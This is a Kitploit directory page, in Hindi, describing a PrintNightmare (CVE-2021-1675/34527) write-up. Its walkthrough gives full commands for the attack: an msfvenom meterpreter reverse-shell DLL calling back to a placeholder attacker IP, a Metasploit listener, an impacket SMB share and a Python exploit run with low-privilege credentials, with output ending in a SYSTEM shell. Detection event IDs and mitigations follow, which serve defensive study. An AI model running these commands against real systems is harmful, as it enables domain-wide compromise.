Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-1675-PrintNightmare-Analysis — PrintNightmare (CVE-2021-1675 / CVE-2021-34527) का तकनीकी विवरण और विश्लेषण, जिसमें RCE/LPE शोषण, Windows इवेंट लॉग के माध्यम से पहचान, तथा Print Spooler के लिए शमन शामिल है। | Kitploit
उपकरण/GitHubGitHub/velessecurity/cve-2021-1675-printnightmare-analysis
विशेषाधिकार वृद्धिटोहीभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगपेपर और शोधलर्निंग और शिक्षाघटना प्रतिक्रियालॉग विश्लेषण

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHubvelessecurity/cve-2021-1675-printnightmare-analysis

CVE-2021-1675-PrintNightmare-Analysis

PrintNightmare (CVE-2021-1675 / CVE-2021-34527) का तकनीकी विवरण और विश्लेषण, जिसमें RCE/LPE शोषण, Windows इवेंट लॉग के माध्यम से पहचान, तथा Print Spooler के लिए शमन शामिल है।

रिपॉजिटरी देखें
522 दिन पहलेअभी तक समीक्षित नहीं

भेद्यता अनुसंधान: Windows Print Spooler के माध्यम से स्थानीय विशेषाधिकार वृद्धि और RCE (PrintNightmare / CVE-2021-1675)

रिपॉजिटरी में Windows Print Spooler सेवा में महत्वपूर्ण भेद्यता का विस्तृत तकनीकी विवरण (Write-up) और शोषण अवधारणा का विश्लेषण शामिल है, जो कम-विशेषाधिकार वाले डोमेन उपयोगकर्ता को अधिकतम सिस्टम विशेषाधिकारों के साथ दूरस्थ रूप से मनमाना कोड निष्पादित करने की अनुमति देती है।

🛑 चेतावनी और अस्वीकरण: यह सामग्री विशेष रूप से शैक्षिक उद्देश्यों और वैध सुरक्षा ऑडिट (Pentest) आयोजित करने के लिए तैयार की गई है। स्वामियों की पूर्व लिखित सहमति के बिना सिस्टम के विरुद्ध वर्णित तकनीकों का उपयोग कानून द्वारा दंडनीय है।


📌 अनुसंधान की प्रासंगिकता और संदर्भ

PrintNightmare परिवार की भेद्यताएँ Windows Server और Active Directory पर आधारित कॉर्पोरेट वातावरण के लिए एक गंभीर खतरा पैदा करती हैं। MS-RPRN (Print System Remote Protocol) और MS-PAR (Print System Asynchronous Remote Protocol) RPC इंटरफेस में अनुमति जाँच का स्थापत्य दोष किसी दूरस्थ सर्वर पर प्रिंटर ड्राइवर स्थापना का वैध रूप से अनुरोध करने की अनुमति देता है।

मुख्य खतरा इस तथ्य में निहित है कि प्रिंट स्पूलर सेवा (spoolsv.exe) डिफ़ॉल्ट रूप से अधिकांश सर्वरों पर सक्रिय रहती है, जिसमें डोमेन कंट्रोलर (Domain Controllers) शामिल हैं, और यह उच्चतम विशेषाधिकार NT AUTHORITY\SYSTEM के संदर्भ में चलती है। एक कम-विशेषाधिकार वाले खाते (जैसे फ़िशिंग के माध्यम से) से समझौता करने पर हमलावर तुरंत संपूर्ण Active Directory अवसंरचना पर पूर्ण नियंत्रण प्राप्त कर सकता है।


🏗 अनुसंधान अभिकल्पना और स्टैक

  • लक्ष्य: प्रिंट RPC इंटरफेस के माध्यम से दूरस्थ Windows होस्ट पर नियंत्रण प्राप्त करना।
  • हमला वेक्टर: RPC Remote Driver Load → DLL Injection → SYSTEM Privileges।
  • उपकरण: impacket (rpcdump, smbserver), msfvenom, Metasploit Framework, Python एक्सप्लॉइट।

📈 व्यावहारिक शोषण प्रक्रिया

चरण 1. टोही और क्रेडेंशियल संग्रह (Reconnaissance)

दूरस्थ कोड निष्पादन (RCE) वेक्टर को लागू करने के लिए न्यूनतम अधिकारों वाले वैध डोमेन उपयोगकर्ता क्रेडेंशियल आवश्यक हैं (अनुसंधान की शर्तों में प्रदान किए गए)।

  • सेवा का बुनियादी ऑडिट: लक्षित Windows मशीन पर प्रिंट स्पूलर सेवा (spoolsv.exe) सक्रिय है और अधिकतम विशेषाधिकार SYSTEM के साथ चल रही है, जो अविश्वसनीय लाइब्रेरी लोड करके होस्ट पर स्थानीय विशेषाधिकार वृद्धि (LPE) का सीधा अवसर खोलती है।

चरण 2. RPC इंटरफेस की स्कैनिंग (Scanning)

मुख्य एक्सप्लॉइट चलाने से पहले यह सुनिश्चित करना आवश्यक है कि दूरस्थ मशीन कमजोर प्रिंट प्रोटोकॉल प्रदान करती है और नेटवर्क संपर्क के लिए खुली है। हम लक्ष्य प्रणाली के RPC इंटरफेस का सर्वेक्षण करते हैं:

root@kitploit:~
impacket-rpcdump @<TARGET_IP> | egrep 'MS-RPRN|MS-PAR'

नियंत्रित टर्मिनल आउटपुट:

root@kitploit:~
Protocol: [MS-RPRN], Endpoint: [\pipe\spoolss]
Protocol: [MS-PAR], Endpoint: [\pipe\spoolss]
  • चरण की अंतर्दृष्टि: लक्ष्य होस्ट ने सफलतापूर्वक प्रोटोकॉल स्ट्रिंग्स [MS-RPRN] और [MS-PAR] लौटाईं। यह 100% पुष्टि करता है कि सिस्टम आवश्यक दूरस्थ प्रिंटिंग इंटरफेस का समर्थन करता है और PrintNightmare वेक्टर के प्रति संवेदनशील है।

चरण 3. पेलोड और अवसंरचना की तैयारी (Weaponization)

1. रिवर्स-शेल के साथ दुर्भावनापूर्ण DLL का निर्माण:

हम x64 आर्किटेक्चर के लिए पेलोड बनाते हैं, जिसमें रिवर्स नेटवर्क कनेक्शन के लिए अपने हमलावर मशीन का IP पता निर्दिष्ट होता है:

root@kitploit:~
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ATTACKER_IP> LPORT=4444 -f dll -o /tmp/malicious.dll

2. Metasploit में पृष्ठभूमि श्रवक (Listener) प्रारंभ करना:

root@kitploit:~
msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST <ATTACKER_IP>; set LPORT 4444; run -j"

3. स्थानीय SMB शेयर तैनात करना:

लक्षित Windows सर्वर के पास किसी तृतीय-पक्ष उपयोगिता के बिना नेटवर्क से हमारी DLL लाइब्रेरी डाउनलोड करने का वैध अवसर होना चाहिए। हम /tmp फ़ोल्डर से SMBv2 प्रोटोकॉल समर्थन वाला SMB सर्वर प्रारंभ करते हैं:

root@kitploit:~
sudo impacket-smbserver tmp /tmp -smb2support

चरण 4. शोषण और सिस्टम अधिग्रहण (Exploitation)

हम Python एक्सप्लॉइट स्क्रिप्ट चलाते हैं, उसे कम-विशेषाधिकार वाले डोमेन उपयोगकर्ता क्रेडेंशियल और हमारी स्थानीय SMB शेयर पर दुर्भावनापूर्ण लाइब्रेरी का UNC पथ प्रदान करते हैं:

root@kitploit:~
python3 CVE-2021-1675.py <LOW_PRIV_USER>:<PASSWORD>@<TARGET_IP> '\\<ATTACKER_IP>\tmp\malicious.dll'

सफल सत्र अवरोधन लॉग (Metasploit):

root@kitploit:~
[*] Started reverse TCP handler on <ATTACKER_IP>:4444 
[*] Sending stage (200574 bytes) to <TARGET_IP>
[*] Meterpreter session 1 opened (<ATTACKER_IP>:4444 -> <TARGET_IP>:49321)

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > shell
Process 3412 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.1935]
(c) माइक्रोसॉफ्ट कॉर्पोरेशन। सर्वाधिकार सुरक्षित।

C:\Windows\system32> whoami
nt authority\system
  • परिणाम: एक्सप्लॉइट को कॉल करने के बाद दूरस्थ प्रिंटर सेवा ने नेटवर्क फ़ोल्डर से दुर्भावनापूर्ण ड्राइवर को सफलतापूर्वक लोड किया। Metasploit में उच्चतम विशेषाधिकार NT AUTHORITY\SYSTEM के साथ Meterpreter सत्र खुल गया। लक्ष्य पूरी तरह से समझौता हो गया है।

🔍 समझौते के संकेतक और पहचान (Detection)

Blue Team विशेषज्ञों के लिए, PrintNightmare शोषण की पहचान Windows सिस्टम लॉग के ऑडिट और प्रक्रियाओं की असामान्य गतिविधि पर नज़र रखने पर आधारित है।

1. Windows ईवेंट निगरानी (Event Logs)

एक्सप्लॉइट का सफल निष्पादन प्रिंट और सिस्टम लॉग में विशिष्ट प्रविष्टियाँ छोड़ता है:

  • Event ID 808 (PrintService): प्रिंटर मॉड्यूल की विफलता या असामान्य लोडिंग का पंजीकरण। यह लोड की गई तृतीय-पक्ष DLL का नाम देखने की अनुमति देता है (उदाहरण के लिए, C:\Windows\System32\spool\drivers\x64\3\ पथों से)।
  • Event ID 7031 (System): एक्सप्लॉइट की अस्थिर कार्यप्रणाली के कारण प्रिंट स्पूलर (Print Spooler) सेवा का अचानक जबरन पुनरारंभ।

2. प्रक्रिया व्यवहार (EDR / Sysmon)

  • असामान्य चाइल्ड गतिविधि: कमांड-लाइन प्रक्रियाओं (cmd.exe, powershell.exe) या डेटा संग्रह उपयोगिताओं की उपस्थिति, जिनका पैरेंट सिस्टम प्रक्रिया प्रिंट स्पूलर spoolsv.exe हो। वैध परिस्थितियों में spoolsv.exe कभी भी कमांड शेल उत्पन्न नहीं करता।
  • नेटवर्क गतिविधि: ड्राइवर फ़ाइलें डाउनलोड करने के लिए spoolsv.exe प्रक्रिया द्वारा बाहरी SMB संसाधनों (पोर्ट 445) के लिए आउटगोइंग नेटवर्क कनेक्शन स्थापित करना।

🛡 भेद्यता उन्मूलन हेतु अनुशंसाएँ (Mitigation)

  1. सेवा को पूर्ण रूप से अक्षम करें (अनुशंसित): यदि सर्वर प्रिंटिंग कार्य नहीं करता है (विशेषकर डोमेन कंट्रोलर पर), तो Print Spooler सेवा को पूरी तरह से अक्षम कर Disabled मोड में रखा जाना चाहिए।
  2. दूरस्थ प्रिंटिंग को सीमित करें: समूह नीति (GPO) के माध्यम से दूरस्थ प्रिंटिंग की क्षमता अक्षम करें:
    • Computer Configuration -> Administrative Templates -> Printers -> Allow Print Spooler to accept client connections (Disabled)।
  3. अद्यतन स्थापित करें: प्रिंटिंग सबसिस्टम में दूरस्थ कोड निष्पादन भेद्यताओं को बंद करने के लिए Microsoft के आधिकारिक सुरक्षा अद्यतन (KB) समय पर स्थापित करें।

🔗 उपयोगी लिंक और सामग्री

  • CVE डेटाबेस: NIST NVD - CVE-2021-1675 | NIST NVD - CVE-2021-34527
  • विश्लेषणात्मक लेख: Microsoft Security Update Advisory
टूल डाउनलोड करें